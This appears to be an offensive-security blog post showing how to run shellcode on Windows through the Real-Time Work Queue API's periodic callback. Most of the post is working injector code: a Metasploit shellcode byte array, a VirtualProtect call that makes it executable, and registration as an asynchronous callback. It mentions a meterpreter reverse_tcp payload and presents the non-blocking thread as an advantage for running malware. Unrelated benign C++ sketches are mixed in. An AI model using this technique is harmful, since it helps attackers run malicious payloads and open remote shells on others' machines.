Rtwq Shellcode Execution

Overview

While reviewing existing shellcode injection techniques on Windows x64 (10/11), I was particularly impressed by callback injection: simple to code and versatile enough to sometimes enable remote process injection. Hence my previous blog entry about it.
This time I started by reading up on processes and threads, since these are the basic units for running code in Windows. It was fun to look at thread pools and fibers and see how they were weaponized for shellcode execution, really impressive. Looking for something else that could be useful, I turned my attention to UMS (user-mode scheduling), essentially a thread scheduling mechanism. It seemed promising at first, but the documentation carries this note: "As of Windows 11, user-mode scheduling is not supported. All calls fail with the error ERROR_NOT_SUPPORTED." I decided it wasn't worth working on an already discontinued and obsolete technology. Then came the Multimedia Class Scheduler Service (MMCSS).

What is Rtwq

Under the Multimedia Class Scheduler Service there's an API set for managing work queues called the Real-Time Work Queue API (Rtwq). This platform seems to use thread pools and worker threads to implement and dispatch work items. Rtwq's legitimate usage flow seems to be something like this:

Create a work queue
Create an IRtwqAsyncResult interface, which is the work item
Schedule the execution of the work item by placing it in a work queue

The asynchronous nature of Rtwq's work items is particularly interesting since it might allow me to avoid blocking the injector program.

All in all there's an interesting base for running shellcode here: we have a set of functions for asynchronous execution of work items on worker threads. But can we weaponize it? Yup.
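The create / work item / schedule flow described above can be modeled in portable C++. This is only a sketch of the pattern and does not use the Rtwq API: WorkQueue, put and work_item_runs_off_caller_thread are hypothetical names I made up for illustration, and the "work item" is a harmless lambda that records which thread it ran on.

```cpp
#include <condition_variable>
#include <functional>
#include <future>
#include <mutex>
#include <queue>
#include <thread>

// Hypothetical stand-in for a work queue with one worker thread.
// NOT part of the Rtwq API; it only models the flow.
class WorkQueue {
public:
    WorkQueue() : worker_([this] { run(); }) {}

    ~WorkQueue() {
        {
            std::lock_guard<std::mutex> lock(m_);
            stopping_ = true;
        }
        cv_.notify_one();
        worker_.join();
    }

    // Schedule a work item by placing it in the queue.
    void put(std::function<void()> item) {
        {
            std::lock_guard<std::mutex> lock(m_);
            items_.push(std::move(item));
        }
        cv_.notify_one();
    }

private:
    // Worker loop: wait for items and run them off the caller's thread.
    void run() {
        for (;;) {
            std::function<void()> item;
            {
                std::unique_lock<std::mutex> lock(m_);
                cv_.wait(lock, [this] { return stopping_ || !items_.empty(); });
                if (items_.empty()) return;  // stopping and nothing left to run
                item = std::move(items_.front());
                items_.pop();
            }
            item();
        }
    }

    std::mutex m_;
    std::condition_variable cv_;
    std::queue<std::function<void()>> items_;
    bool stopping_ = false;
    std::thread worker_;  // declared last so the members above exist before it starts
};

// Returns true if the work item ran on a thread other than the caller's.
bool work_item_runs_off_caller_thread() {
    WorkQueue queue;                               // 1. create the work queue
    std::promise<std::thread::id> ran_on;
    auto result = ran_on.get_future();
    auto item = [&ran_on] {                        // 2. create the work item
        ran_on.set_value(std::this_thread::get_id());
    };
    queue.put(item);                               // 3. schedule it
    return result.get() != std::this_thread::get_id();
}
```

The caller only blocks here because it explicitly waits on the future; without that wait it would be free to carry on while the worker thread runs the item, which is the property that makes this kind of API interesting.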

How do you weaponize it

So far I haven't been able to perform remote code injection; I'll eventually get there. But it's relatively easy to run code inside the injector process.

Shellcode execution with RtwqAddPeriodicCallback

This execution method uses RtwqAddPeriodicCallback to register our shellcode as a callback. Looking at its definition:

HRESULT RtwqAddPeriodicCallback(
  [in]            RTWQPERIODICCALLBACK Callback,
                  IUnknown             *context,
  [out, optional] DWORD                *key
);

This seemed simple enough to get up and running quickly: allocate or embed the payload in the parent process, change the memory permissions to allow execution, and cast the buffer's address to RTWQPERIODICCALLBACK.

There's a small hindrance to overcome here: we need to link additional dependencies to compile with Rtwq.

This was my process using the Visual Studio Installer. You can do this on Linux too; I don't care if it's better or worse, I went this way so I wouldn't have to bother too much with the development environment. What needs to be done:

Open the Visual Studio Installer
Modify the installed version of Visual Studio
Go to the Individual Components tab
Search for and check the boxes for:
1. Media Foundation
2. Windows 10 SDK or Windows 11 SDK, depending on the target OS
Click Modify to install the components.

Now we need to link against the following libraries:

mfplat.lib
mf.lib
mfuuid.lib
rtworkq.lib

placehold Go to the project properties, then Configuration Properties, Linker, and start with General. Here we need to add the folder containing the .lib files under Additional Library Directories; in my case these were at C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\x64.

Then move on to Input and list the .lib files from the list above under Additional Dependencies: placehold

This should be enough to compile everything. If there are still dependency errors, sucks to be you: roll up your sleeves and get cracking.

Let's go through the code:

#include <iostream>
#include <windows.h>
#include <rtworkq.h>
using namespace std;

Standard dependencies, the odd one out being rtworkq.h, the header file with the declarations we need to use Rtwq.

unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
...

Add the shellcode wherever you like. I hardcoded it as a global variable, generated with Metasploit for simplicity.

int main()
{
    HRESULT hr = S_OK;
    DWORD callbackKey = 0x00;
    hr = RtwqStartup();
    if (FAILED(hr)) {
        cout << "rtwq startup failed, add more code to fetch the error if you want" << endl;
        return -1;
    }
...

We start with the variable definitions: hr captures the result of the RtwqStartup and RtwqAddPeriodicCallback calls, and callbackKey receives the key that RtwqAddPeriodicCallback hands back. This key can later be passed to RtwqRemovePeriodicCallback to cancel the callback, shutting down any code running there.
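If you do want to "fetch the error", a minimal approach is to print the HRESULT in hex so it can be looked up. The sketch below is portable on purpose: hresult_t is my own stand-in for the Windows HRESULT type, and hr_failed and describe_hr are hypothetical helper names, not part of any Windows header. On Windows you would use HRESULT and the FAILED macro directly.

```cpp
#include <cstdint>
#include <cstdio>
#include <string>

// Stand-in for the Windows HRESULT type (a 32-bit signed value),
// so this sketch builds without windows.h.
using hresult_t = std::int32_t;

// Same check the FAILED() macro performs: a negative value means failure.
bool hr_failed(hresult_t hr) { return hr < 0; }

// Builds a log line such as "RtwqStartup failed (hr=0x80004005)".
std::string describe_hr(const char* what, hresult_t hr) {
    char line[128];
    std::snprintf(line, sizeof(line), "%s %s (hr=0x%08X)",
                  what,
                  hr_failed(hr) ? "failed" : "succeeded",
                  static_cast<unsigned>(hr));
    return line;
}
```

In the injector this would replace the fixed error string, for example cout << describe_hr("RtwqStartup", hr) << endl; which gives you a code to search for instead of a generic message.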

...
    LPVOID lpstub = (LPVOID)buf;
    DWORD oldprotect;

    BOOL r = VirtualProtect(lpstub, sizeof(buf), PAGE_EXECUTE_READ, &oldprotect);

    if (!r) {
        cout << "failed memory preparation" << endl;
        return -1;
    }
...

We cast buf to LPVOID, declare oldprotect, and mark buf's memory as executable with VirtualProtect. Of course you could download the shellcode at runtime, allocate heap memory for it, and make that executable instead; here it's hardcoded, since payload distribution is out of scope.

    hr = RtwqAddPeriodicCallback((RTWQPERIODICCALLBACK)lpstub, nullptr, &callbackKey);
    if (FAILED(hr)) {
        cout << "rtwq add periodic callback failed" << endl;
    }
    getchar();
    RtwqRemovePeriodicCallback(callbackKey);
    RtwqShutdown();
    return 0;
}

In this section we actually get the callback running: lpstub is cast to RTWQPERIODICCALLBACK and passed as the first argument, the context pointer can be null despite not being marked as optional, and the address of callbackKey is passed as the last argument. If the call was successful the shellcode should execute shortly; the callback runs asynchronously at a fixed interval, which the documentation unfortunately does not define**. getchar(); keeps the main thread waiting so the process does not exit and cut the callback short. RtwqRemovePeriodicCallback(callbackKey); cancels the callback identified by the provided key, and RtwqShutdown(); shuts down the Rtwq platform***. In the following example I'm using a stageless payload which spawns a new process.

placehold

In this gif I use a staged meterpreter payload; you can clearly see that the shellcode does not block the main thread.

placehold

But where is it running?

The shellcode is obviously not being injected into a remote process, but it's also not running in the main thread. Whether it spawns a new process or not depends on the payload. Let's consider a staged x64 meterpreter payload, windows/x64/meterpreter/reverse_tcp.
Looking at the injector process before the callback executes: placehold

After the payload triggers: placehold

Compare with function pointer shellcode execution

Using function pointer casting:

LPVOID lpstub = (LPVOID)buf;
DWORD oldprotect;

BOOL r = VirtualProtect(lpstub, sizeof(buf), PAGE_EXECUTE_READ, &oldprotect);

if (!r) {
    cout << "failed memory preparation" << endl;
    return -1;
}

cout << "press to trigger payload" << endl;

getchar();

((void(*)())lpstub)();

cout << "blocking mainthread" << endl;

getchar();

We get a similar thread profile before payload execution: placehold

After executing the shellcode we can see it's running in the process's main thread: placehold

So this specific callback technique has a clear advantage over simple function pointer casting: the code runs asynchronously in a separate thread pool thread. You still need to be careful, since unhandled exceptions raised in these threads will affect the main process and cause a crash.
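The difference between the two thread profiles can be reproduced with a harmless function in portable C++. This is a sketch under my own assumptions: std::async stands in for the Rtwq worker thread (it is not how Rtwq dispatches callbacks internally), and where_am_i, ThreadProfile and compare_call_styles are hypothetical names used only for this illustration.

```cpp
#include <future>
#include <thread>

// Benign placeholder for "the code being run": reports the thread it ran on.
std::thread::id where_am_i() { return std::this_thread::get_id(); }

struct ThreadProfile {
    bool direct_on_caller;  // did the direct call run on the caller's thread?
    bool async_on_caller;   // did the dispatched call run on the caller's thread?
};

ThreadProfile compare_call_styles() {
    const std::thread::id caller = std::this_thread::get_id();

    // Function pointer style: a plain call on the caller's thread,
    // and the caller is stuck until it returns.
    std::thread::id (*fn)() = where_am_i;
    const std::thread::id direct = fn();

    // Callback style, modeled with std::async: the function runs on a
    // separate thread while the caller is free until it asks for the result.
    std::future<std::thread::id> pending =
        std::async(std::launch::async, where_am_i);
    const std::thread::id dispatched = pending.get();

    return {direct == caller, dispatched == caller};
}
```

The direct call reports the caller's own thread, while the dispatched one reports a different thread, which matches what the two sets of screenshots show for the function pointer and Rtwq variants.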

Refs

*https://learn.microsoft.com/en-us/windows/win32/api/rtworkq/nf-rtworkq-rtwqscheduleworkitem
**https://learn.microsoft.com/en-us/windows/win32/api/rtworkq/nf-rtworkq-rtwqaddperiodiccallback
***https://learn.microsoft.com/en-us/windows/win32/api/rtworkq/nf-rtworkq-rtwqshutdown